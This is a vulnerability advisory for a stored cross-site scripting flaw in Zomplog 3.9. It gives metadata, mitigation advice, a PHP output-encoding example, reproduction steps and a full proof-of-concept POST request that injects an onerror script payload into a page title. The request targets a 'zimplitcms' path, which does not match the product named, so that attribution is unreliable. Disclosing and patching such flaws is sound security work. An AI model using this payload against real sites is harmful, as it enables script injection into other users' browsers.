Vendor: Zomplog
By: Mirabbas Agalarov
CVSS: 5.5 (MEDIUM)
CWE: 79, Cross-site scripting (XSS)
Product Name: Zomplog
Affected Version From: Zomplog v3.9
Affected Version To: Zomplog v3.9
Patch Exists: NO
Related CWE:
CPE: a:zomplog:zomplog:3.9
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

Zomplog 3.9 – Cross-site scripting (XSS)

The Zomplog v3.9 application is vulnerable to cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious code into the 'title' parameter of the POST request. This can lead to the execution of arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input before using it in the application. Users are advised to update to a patched version of the software when available.
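
The output-encoding side of this mitigation, sketched in PHP as an added example (not Zomplog's code and not part of the original advisory). The page records and the functions `render_menu_unsafe`, `render_menu_safe` and `h` are hypothetical names; the second record is constructed from the file name and title values in the PoC request on this page.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for stored page records; the application's real
// storage and menu code are not shown in the advisory.
$pages = [
    ['file' => 'index.html', 'title' => 'Home'],
    // Constructed record using the values from the PoC request.
    ['file'  => 'img_src=x_onerror=alert(5).html',
     'title' => '<img src=x onerror=alert(5)>'],
];

// Unsafe pattern: stored values are concatenated into HTML unchanged, so any
// markup in the title is parsed by the browser when the menu is viewed.
function render_menu_unsafe(array $pages): string
{
    $html = "<ul>\n";
    foreach ($pages as $p) {
        $html .= '  <li><a href="' . $p['file'] . '">' . $p['title'] . "</a></li>\n";
    }
    return $html . "</ul>\n";
}

// HTML-encode a value for element content or a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: encode at output time, once per context written to.
function render_menu_safe(array $pages): string
{
    $html = "<ul>\n";
    foreach ($pages as $p) {
        // The file name is a URL path segment first, then an attribute value.
        $href = h(rawurlencode($p['file']));
        $html .= '  <li><a href="' . $href . '">' . h($p['title']) . "</a></li>\n";
    }
    return $html . "</ul>\n";
}

// Print both renderings so the difference in the second menu entry is visible.
echo render_menu_unsafe($pages);
echo render_menu_safe($pages);
```

Encoding when the menu is rendered, rather than only filtering when the page is saved, also covers titles that were stored before any fix was applied.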

Exploit-DB raw data:

Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs:  XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty